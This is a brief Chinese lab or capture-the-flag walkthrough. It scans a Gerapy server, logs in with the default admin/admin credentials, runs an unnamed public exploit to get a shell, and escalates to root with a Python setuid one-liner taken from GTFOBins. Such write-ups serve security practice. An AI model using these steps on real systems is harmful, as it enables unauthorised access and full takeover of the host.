启程:
老样子开扫端口,22端口自动忽略,看到8000端口搭载着Gerapy服务
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA)
|_ 256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519)
8000/tcp open http-alt WSGIServer/0.2 CPython/3.10.6
|_http-title: Gerapy
|_http-server-header: WSGIServer/0.2 CPython/3.10.6
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404 Not Found
| Date: Tue, 18 Mar 2025 03:05:14 GMT
| Server: WSGIServer/0.2 CPython/3.10.6
| Content-Type: text/html
| Content-Length: 9979
| Vary: Origin
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta http-equiv="content-type" content="text/html; charset=utf-8">
| <title>Page not found at /nice ports,/Trinity.txt.bak</title>
| <meta name="robots" content="NONE,NOARCHIVE">
| <style type="text/css">
| html * { padding:0; margin:0; }
| body * { padding:10px 20px; }
| body * * { padding:0; }
| body { font:small sans-serif; background:#eee; color:#000; }
| body>div { border-bottom:1px solid #ddd; }
| font-weight:normal; margin-bottom:.4em; }
| span { font-size:60%; color:#666; font-weight:normal; }
| table { border:none; border-collapse: collapse; width:100%; }
| vertical-align:top; padding:2px 3px; }
| width:12em; text-align:right; color:#6
| GetRequest:
| HTTP/1.1 200 OK
| Date: Tue, 18 Mar 2025 03:05:09 GMT
| Server: WSGIServer/0.2 CPython/3.10.6
| Content-Type: text/html; charset=utf-8
| Vary: Accept, Origin
| Allow: GET, OPTIONS
| Content-Length: 2530
|_ <!DOCTYPE html><html lang=en><head><meta charset=utf-8><meta http-equiv=X-UA-Compatible content="IE=edge"><meta name=viewport content="width=device-width,initial-scale=1"><link rel=icon href=/favicon.ico><title>Gerapy</title><link href=/static/css/chunk-10b2edc2.79f68610.css rel=prefetch><link href=/static/css/chunk-12e7e66d.8f856d8c.css rel=prefetch><link href=/static/css/chunk-39423506.2eb0fec8.css rel=prefetch><link href=/static/css/chunk-3a6102b3.0fe5e5eb.css rel=prefetch><link href=/static/css/chunk-4a7237a2.19df386b.css rel=prefetch><link href=/static/css/chunk-531d1845.b0b0d9e4.css rel=prefetch><link href=/static/css/chunk-582dc9b0.d60b5161.css rel=prefetch><link href=/static/css/chun
|_http-cors: GET POST PUT DELETE OPTIONS PATCH果断上网查一下这个服务有没有exp,由于没有版本只能一个一个试
然后我们找到一个版本好像可以用结果没成功,他报错说让我建个项目在web控制台
我果断回github看一下这个项目的介绍,发现果然得创个项目要不然执行不了shell,也就是出现上面的情况
接下来我们使用弱口令成功登录admin/admin,然后找到projects中随便创一下就行,让exp可以检测到项目存在
然后我们再执行一下exp,这回果然拿到shell了
然后我们使用这条命令提权即可,这里提权的思路很简单因为linpeas直接给你标出来了,像这种高亮就代表基本稳了(95%成功率)
python3.10 -c 'import os; os.setuid(0); os.system("/bin/sh")'
这里提权的命令一开始我没想到去GTFObins查看,但是去浏览器一搜直接导过去了,一看还真有对应的方法,直接变一下就能用
这里也是成功到root权限
总结:
本来这个靶场我是不打算记录的,但是这个提权值得我单独发一下,整体难度是不大的无需在意